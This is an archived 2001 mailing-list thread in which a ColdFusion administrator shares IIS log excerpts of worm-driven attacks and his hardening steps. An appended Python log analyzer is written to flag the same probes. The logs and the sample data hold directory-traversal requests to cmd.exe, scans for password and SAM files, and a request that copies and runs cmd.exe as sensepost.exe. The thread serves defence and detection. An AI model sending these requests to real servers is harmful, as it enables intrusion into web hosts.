A little more info is starting to go around. This attack is a scripted
attack from a worm that infects Solaris machines, which then attack up to
2000 IIS servers before putting up the f*ck usa pages on the Solaris
machine. Mostly harmless, but you gotta admire the mind that came up with
that. Script kiddies who are too lazy to run their own scripts! ;-)

I am getting more and more annoyed at Microsoft's poor excuse for a web
server every day though.

jon
----- Original Message -----
From: <[EMAIL PROTECTED]>
To: "CF-Talk" <[EMAIL PROTECTED]>
Sent: Tuesday, May 08, 2001 9:52 PM
Subject: OT: Log files of a web attack.


> Hi,
>
> I thought the group would like to see the techniques of a recent attack on
> our web servers. They've been doing this a couple times a day for a week.
> UUNet (their ISP) is slow in stopping them.
>
> To secure IIS we've removed all extensions except cfm. We've taken out all
> the iis folders and files like /mdac, /scripts and /printers. We've secured
> the cfide folder with passwords, including locking out the user after a couple
> of failed attempts, and log the failures. Lastly, we've removed all permissions
> from cmd.exe.
>
> This has kept them out to date. Any additional ideas are welcomed. None of
> this is top secret info, the hackers already know it, but do you, and are you
> protected?
>
> HTH,
>
> Rick Moon
>
>
> 2001-05-08 12:36:44 209.183.204.251 - myIP 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-08 12:36:44 209.183.204.251 - myIP 80 GET /scripts/..%pc../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-08 12:36:45 209.183.204.251 - myIP 80 GET /scripts/..%9v../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-08 12:36:56 209.183.204.251 - myIP 80 GET /scripts/..%qf../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-08 12:37:00 209.183.204.251 - myIP 80 GET /scripts/..%8s../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-08 12:37:00 209.183.204.251 - myIP 80 GET /scripts/...../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-08 12:37:04 209.183.204.251 - myIP 80 GET /scripts/..o../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-08 12:37:08 209.183.204.251 - myIP 80 GET /scripts/..??../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-08 12:37:08 209.183.204.251 - myIP 80 GET /scripts/..???../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-08 12:38:17 209.183.204.251 - myIP 80 GET /msadc/../../../../../../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-03 01:26:07 200.245.48.155 - myIP GET /scripts..\../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-03 17:57:58 200.230.112.153 - myIP 80 GET /iisadmpwd/../../../../../../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-03 17:58:00 200.230.112.153 - myIP 80 GET /msadc/../../../../../../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-03 17:58:14 200.230.112.153 - myIP 80 GET /cgi-bin/../../../../../../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-03 17:58:22 200.230.112.153 - myIP 80 GET /samples/../../../../../../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-03 17:58:29 200.230.112.153 - myIP 80 GET /_vti_cnf/../../../../../../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-03 17:58:36 200.230.112.153 - myIP 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-03 17:58:42 200.230.112.153 - myIP 80 GET /adsamples/../../../../../../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-05 02:43:02 200.245.48.132 - myIP 80 HEAD /aaa - 404 -
> 2001-05-05 02:43:04 200.245.48.132 - myIP 80 HEAD /carbo.dll - 404 -
> 2001-05-05 02:43:04 200.245.48.132 - myIP 80 HEAD /cgi-win/uploader.exe - 404 -
> 2001-05-05 02:43:06 200.245.48.132 - myIP 80 HEAD /search97.vts - 404 -
> 2001-05-05 02:43:08 200.245.48.132 - myIP 80 HEAD /_vti_inf.html - 200 -
> 2001-05-05 02:43:10 200.245.48.132 - myIP 80 HEAD /_vti_pvt/service.pwd - 404 -
> 2001-05-05 02:43:12 200.245.48.132 - myIP 80 HEAD /_vti_pvt/users.pwd - 404 -
> 2001-05-05 02:43:13 200.245.48.132 - myIP 80 HEAD /_vti_pvt/authors.pwd - 404 -
> 2001-05-05 02:43:17 200.245.48.132 - myIP 80 HEAD /....../autoexec.bat - 404 -
> 2001-05-05 02:43:17 200.245.48.132 - myIP 80 HEAD /..../config.sys - 404 -
> 2001-05-05 02:43:20 200.245.48.132 - myIP 80 HEAD /iisadmpwd/achg.htr - 404 -
> 2001-05-05 02:43:20 200.245.48.132 - myIP 80 HEAD /iisadmpwd/aexp.htr - 404 -
> 2001-05-05 02:43:21 200.245.48.132 - myIP 80 HEAD /iisadmpwd/aexp2.htr - 404 -
> 2001-05-05 02:43:21 200.245.48.132 - myIP 80 HEAD /iisadmpwd/aexp2b.htr - 404 -
> 2001-05-05 02:43:24 200.245.48.132 - myIP 80 HEAD /iisadmpwd/aexp3.htr - 404 -
> 2001-05-05 02:43:24 200.245.48.132 - myIP 80 HEAD /iisadmpwd/aexp4.htr - 404 -
> 2001-05-05 02:43:25 200.245.48.132 - myIP 80 HEAD /iisadmpwd/aexp4b.htr - 404 -
> 2001-05-05 02:43:25 200.245.48.132 - myIP 80 HEAD /iisadmpwd/anot.htr - 404 -
> 2001-05-05 02:43:27 200.245.48.132 - myIP 80 HEAD /iisadmpwd/anot3.htr - 404 -
> 2001-05-05 02:43:27 200.245.48.132 - myIP 80 HEAD /cgi-bin/visadmin.exe - 404 -
> 2001-05-05 02:43:29 200.245.48.132 - myIP 80 HEAD /scripts/no-such-file.pl - 404 -
> 2001-05-05 02:43:29 200.245.48.132 - myIP 80 HEAD /scripts/fpcount.exe - 404 -
> 2001-05-05 02:43:30 200.245.48.132 - myIP 80 HEAD /cgi-bin/rguest.exe - 404 -
> 2001-05-05 02:43:30 200.245.48.132 - myIP 80 HEAD /cgi-bin/wguest.exe - 404 -
> 2001-05-05 02:43:32 200.245.48.132 - myIP 80 HEAD /default.asp::$DATA - 404 -
> 2001-05-05 02:43:35 200.245.48.132 - myIP 80 HEAD /msadc/Samples/SELECTOR/showcode.asp |-|0|404_Object_Not_Found 404 -
> 2001-05-05 02:43:36 200.245.48.132 - myIP 80 HEAD /adsamples/config/site.csc - 404 -
> 2001-05-05 02:43:36 200.245.48.132 - myIP 80 HEAD /scripts/iisadmin/ism.dll http/dir 404 -
> 2001-05-05 02:43:37 200.245.48.132 - myIP 80 HEAD /AdvWorks/equipment/catalog_type.asp |-|0|404_Object_Not_Found 404 -
> 2001-05-05 02:43:38 200.245.48.132 - myIP 80 HEAD /cfdocs/expelval/openfile.cfm - 401 -
> 2001-05-05 02:43:38 200.245.48.132 - myIP 80 HEAD /cfdocs/expelval/ExprCalc.cfm - 401 -
> 2001-05-05 02:43:44 200.245.48.132 - myIP 80 HEAD /cfdocs/expelval/displayopenedfile.cfm - 401 -
> 2001-05-05 02:43:44 200.245.48.132 - myIP 80 HEAD /cfdocs/expelval/sendmail.cfm - 401 -
> 2001-05-05 02:43:45 200.245.48.132 - myIP 80 HEAD /GetFile.cfm - 200 -
> 2001-05-05 02:43:49 200.245.48.132 - myIP 80 HEAD /cgi-bin/get32.exe - 404 -
> 2001-05-05 02:43:49 200.245.48.132 - myIP 80 HEAD /cgi-bin/alibaba.pl - 404 -
> 2001-05-05 02:43:51 200.245.48.132 - myIP 80 HEAD /cgi-bin/tst.bat - 404 -
> 2001-05-05 02:43:51 200.245.48.132 - myIP 80 HEAD /default.asp - 404 -
> 2001-05-05 02:43:52 200.245.48.132 - myIP 80 HEAD /winnt/repair/sam._ - 404 -
> 2001-05-05 02:43:52 200.245.48.132 - myIP 80 HEAD /cgi-bin/imagemap.exe - 404 -
> 2001-05-05 02:43:52 148.233.95.58 - myIP 80 GET /index.cfm - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98;+Win+9x+4.90)
> 2001-05-05 02:43:54 200.245.48.132 - myIP 80 HEAD /cgi-bin/cgitest.exe - 404 -
> 2001-05-05 02:43:54 200.245.48.132 - myIP 80 HEAD /config.sys - 404 -
> 2001-05-05 02:43:55 200.245.48.132 - myIP 80 HEAD /scripts/webbbs.exe - 404 -
> 2001-05-05 02:43:57 200.245.48.132 - myIP 80 HEAD /cgi-bin/input.bat - 404 -
> 2001-05-05 02:44:03 200.245.48.132 - myIP 80 HEAD /test.idq - 404 -
> 2001-05-05 02:44:04 200.245.48.132 - myIP 80 HEAD /test.ida - 404 -
> 2001-05-05 02:44:05 200.245.48.132 - myIP 80 HEAD /scripts/counter.exe - 404 -
> 2001-05-05 02:44:05 200.245.48.132 - myIP 80 HEAD /common/browser.inc - 404 -
> 2001-05-05 02:44:08 200.245.48.132 - myIP 80 HEAD /cgi-bin/echo.bat - 404 -
> 2001-05-05 02:44:08 200.245.48.132 - myIP 80 HEAD /cgi-bin/hello.bat - 404 -
> 2001-05-05 02:44:09 200.245.48.132 - myIP 80 HEAD /rightfax/fuwww.dll - 404 -
> 2001-05-05 02:44:09 200.245.48.132 - myIP 80 HEAD /scripts/cgimail.exe - 404 -
> 2001-05-05 02:44:12 200.245.48.132 - myIP 80 HEAD /officescan/cgi/jdkRqNotify.exe - 404 -
> 2001-05-05 02:44:12 200.245.48.132 - myIP 80 HEAD /ows-bin/perlidlc.bat &dir 404 -
> 2001-05-05 02:44:13 200.245.48.132 - myIP 80 HEAD /cgi-bin/windmail.exe - 404 -
> 2001-05-05 02:44:16 200.245.48.132 - myIP 80 HEAD /null.htw CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full 404 -
> 2001-05-05 02:44:16 200.245.48.132 - myIP 80 HEAD /_vti_bin/_vti_aut/dvwssr.dll - 404 -
> 2001-05-05 02:44:17 200.245.48.132 - myIP 80 HEAD /scripts/wa.exe - 404 -
> 2001-05-05 02:45:22 200.64.239.78 - myIP 80 GET /index.cfm - 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt)
> 2001-05-05 02:46:23 200.53.250.14 - myIP 80 GET /index.cfm - 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt)
> 2001-05-05 02:48:53 200.245.48.141 - myIP 80 HEAD /index.cfm - 200 -
> 2001-05-05 02:49:25 200.245.48.141 - myIP 80 GET /scripts/..%qf../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-05 02:49:36 200.245.48.141 - myIP 80 GET /scripts/..%8s../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-05 02:49:48 200.245.48.141 - myIP 80 GET /scripts/..\../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-05 02:49:53 200.245.48.141 - myIP 80 GET /scripts/..o../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-05 02:50:05 200.245.48.141 - myIP 80 GET /scripts/..??../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-05 02:50:11 200.245.48.141 - myIP 80 GET /scripts/..???../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-05 02:43:07 200.245.48.132 - myIP HEAD /scripts/tools/newdsn.exe - 404 -
> 2001-05-05 02:43:07 200.245.48.132 - myIP HEAD /scripts/tools/getdrvs.exe - 404 -
> 2001-05-05 02:43:14 200.245.48.132 - myIP HEAD /_vti_pvt/administrators.pwd - 404 -
> 2001-05-05 02:43:14 200.245.48.132 - myIP HEAD /_vti_pvt/shtml.dll - 404 -
> 2001-05-05 02:43:16 200.245.48.132 - myIP HEAD /_vti_pvt/shtml.exe - 404 -
> 2001-05-05 02:43:17 200.245.48.132 - myIP HEAD /samples/search/queryhit.htm - 404 -
> 2001-05-05 02:43:33 200.245.48.132 - myIP HEAD /iissamples/exair/howitworks/codebrws.asp - 404 -
> 2001-05-05 02:43:33 200.245.48.132 - myIP HEAD /iissamples/sdk/asp/docs/codebrws.asp - 404 -
> 2001-05-05 02:43:56 200.245.48.132 - myIP HEAD /cgi-bin/test.bat - 404 -
> 2001-05-05 02:43:59 200.245.48.132 - myIP HEAD /cgi-bin/input2.bat - 404 -
> 2001-05-05 02:43:59 200.245.48.132 - myIP HEAD /ssi/envout.bat - 404 -
> 2001-05-05 02:44:00 200.245.48.132 - myIP HEAD /msadc/msadcs.dll - 404 -
> 2001-05-05 02:44:00 200.245.48.132 - myIP HEAD /cgi-bin/htimage.exe - 404 -
> 2001-05-05 02:44:02 200.245.48.132 - myIP HEAD /test.idc - 404 -
> 2001-05-05 02:44:05 200.245.48.132 - myIP HEAD /test.idw - 404 -
> 2001-05-05 02:44:11 200.245.48.132 - myIP HEAD /default.asp - 404 -
>
> This is the really bad one.
>
> 2001-05-01 08:23:09 200.245.48.145 - myIP 80 GET /scripts/../../winnt/system32/cmd.exe /c+copy%20c:\winnt\system32\cmd.exe%20sensepost.exe
> 2001-05-01 08:23:11 200.245.48.145 - myIP 80 GET /scripts/../../inetpub/scripts/sensepost.exe /c+dir%20c:\inetpub\wwwroot
>
> end.
>
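One way to pull requests like the ones above out of an IIS W3C log automatically, as an added example that is not part of this thread. The parser locates the method token instead of trusting fixed columns, because the excerpt above mixes lines with and without the port field and the last two have no status; a path segment that merely begins with ".." is treated as traversal so the %qf / %8s / ..o.. / ..??.. variants and a real %c0%af sequence all land under one rule; and a client that racks up many 404s is reported as a probe sweep. The rule list, the 404 threshold and the log lines in it (documentation-range addresses) are all my own constructions, not anything from Rick's servers.

```python
"""Flag IIS W3C log lines that look like the traversal, cmd.exe and
sample-file probes shown in the post.  Added example, not the thread's own
code; every log line below is constructed (TEST-NET addresses)."""
import re
from collections import defaultdict
from typing import Dict, List, NamedTuple, Optional, Tuple

METHODS = {"GET", "HEAD", "POST", "PUT", "OPTIONS", "PROPFIND"}

# Paths of the kind the scanner in the post asked for: cmd.exe itself, FrontPage
# password files, the .htr/.ida handlers, sample apps.  Assumed list; extend it.
SENSITIVE_RE = re.compile("|".join([
    r"/cmd\.exe$", r"/system32/", r"/_vti_pvt/.*\.pwd$", r"/iisadmpwd/",
    r"/msadc/", r"/scripts/tools/", r"::\$data$", r"/winnt/repair/",
    r"/(autoexec\.bat|config\.sys)$", r"\.(htr|ida|idq|idw|idc|htw)$",
]), re.IGNORECASE)


class Hit(NamedTuple):
    client: str
    method: str
    stem: str
    query: str
    status: Optional[int]
    reasons: Tuple[str, ...]


def percent_decode(s: str) -> str:
    """Decode well-formed %XX escapes only.  Malformed ones such as %qf or %8s
    (both in the post) stay literal; the traversal rule keys on the '..'
    around them, not on what they decode to."""
    return re.sub(r"%([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), s)


def parse(line: str) -> Optional[Tuple[str, str, str, str, Optional[int]]]:
    """Tolerant W3C extended parser: returns (client, method, stem, query, status).
    Finds the method token rather than trusting column positions, because the
    post's lines differ in field count."""
    tok = line.split()
    idx = next((i for i, t in enumerate(tok) if t in METHODS), None)
    if idx is None or idx < 3 or idx + 1 >= len(tok):
        return None
    stem = tok[idx + 1]
    query = tok[idx + 2] if idx + 2 < len(tok) else "-"
    status = int(tok[idx + 3]) if idx + 3 < len(tok) and tok[idx + 3].isdigit() else None
    return tok[2], tok[idx], stem, query, status


def classify(stem: str, query: str) -> Tuple[str, ...]:
    """Return the rule names a request trips; an empty tuple means clean."""
    decoded = percent_decode(stem)
    reasons = []
    # Any path segment that *starts* with '..' counts as traversal, so '..',
    # '..%qf..', '.....', '..o..', '..??..' and a backslash variant all collapse
    # into one rule.  Deliberately broad: a legitimate '/..hidden' trips it too.
    if any(seg.startswith("..") for seg in re.split(r"[\\/]", decoded)):
        reasons.append("traversal")
    if SENSITIVE_RE.search(decoded):
        reasons.append("sensitive-path")
    q = percent_decode(query).lower()
    if re.match(r"/c[+ ]", q):          # cmd.exe's /c switch passed as the query
        reasons.append("command-switch")
    if "copy" in q and "cmd.exe" in q:  # copying the shell under a new name
        reasons.append("shell-staging")
    return tuple(reasons)


def severity(hit: Hit) -> str:
    if "shell-staging" in hit.reasons or (
            "command-switch" in hit.reasons and hit.status == 200):
        return "critical"  # did not 404: assume the command actually ran
    if "traversal" in hit.reasons or "command-switch" in hit.reasons:
        return "high"
    return "medium" if hit.reasons else "none"


def analyze(lines: List[str], scan_threshold: int = 5) -> Tuple[List[Hit], List[str]]:
    """Return (hits, scanners): hits are rule-tripping requests; scanners are
    clients with at least scan_threshold 404s, the signature of a probe sweep."""
    hits: List[Hit] = []
    misses: Dict[str, int] = defaultdict(int)
    for line in lines:
        parsed = parse(line)
        if parsed is None:
            continue
        client, method, stem, query, status = parsed
        if status == 404:
            misses[client] += 1
        reasons = classify(stem, query)
        if reasons:
            hits.append(Hit(client, method, stem, query, status, reasons))
    return hits, sorted(c for c, n in misses.items() if n >= scan_threshold)


# Constructed sample in the same layout as the post's log excerpt.
SAMPLE_LINES = r"""
2001-05-08 12:36:44 192.0.2.10 - 198.51.100.5 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir 404 -
2001-05-08 12:36:45 192.0.2.10 - 198.51.100.5 80 GET /scripts/..%qf../winnt/system32/cmd.exe /c+dir 404 -
2001-05-08 12:36:46 192.0.2.10 - 198.51.100.5 80 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 404 -
2001-05-08 12:36:47 192.0.2.10 - 198.51.100.5 80 GET /scripts/..??../winnt/system32/cmd.exe /c+dir 404 -
2001-05-08 12:36:48 192.0.2.10 - 198.51.100.5 80 GET /msadc/../../../../winnt/system32/cmd.exe /c+dir 404 -
2001-05-08 12:37:00 192.0.2.20 - 198.51.100.5 80 HEAD /_vti_pvt/service.pwd - 404 -
2001-05-08 12:37:01 192.0.2.20 - 198.51.100.5 80 HEAD /iisadmpwd/aexp.htr - 404 -
2001-05-08 12:37:02 192.0.2.20 - 198.51.100.5 80 HEAD /default.asp::$DATA - 404 -
2001-05-08 12:37:03 192.0.2.20 - 198.51.100.5 80 HEAD /test.ida - 404 -
2001-05-08 12:37:04 192.0.2.20 - 198.51.100.5 HEAD /winnt/repair/sam._ - 404 -
2001-05-08 12:37:05 192.0.2.20 - 198.51.100.5 80 HEAD /aaa - 404 -
2001-05-08 12:37:06 192.0.2.20 - 198.51.100.5 80 HEAD /carbo.dll - 404 -
2001-05-08 12:38:00 192.0.2.30 - 198.51.100.5 80 GET /index.cfm - 200 Mozilla/4.0+(compatible;+MSIE+5.5)
2001-05-08 12:39:00 192.0.2.40 - 198.51.100.5 80 GET /scripts/../../winnt/system32/cmd.exe /c+copy%20c:\winnt\system32\cmd.exe%20sensepost.exe 200 -
""".strip().splitlines()

if __name__ == "__main__":
    found, sweeps = analyze(SAMPLE_LINES)
    for h in found:
        print(f"{severity(h):8} {h.client:12} {h.method} {h.stem} {h.query} -> {','.join(h.reasons)}")
    print("probe sweeps from:", ", ".join(sweeps))
```

The 404 count is the cheap part and the one worth watching on a server hardened the way Rick describes: once the sample folders and cmd.exe are gone, every probe in the sweep misses, so a client piling up dozens of 404s against paths it was never linked to is the signal. The severity rule treats anything other than a 404 on a command-switch request as critical for the same reason: the last two lines in Rick's excerpt have no status at all, which is exactly the case to go and look at by hand.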
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/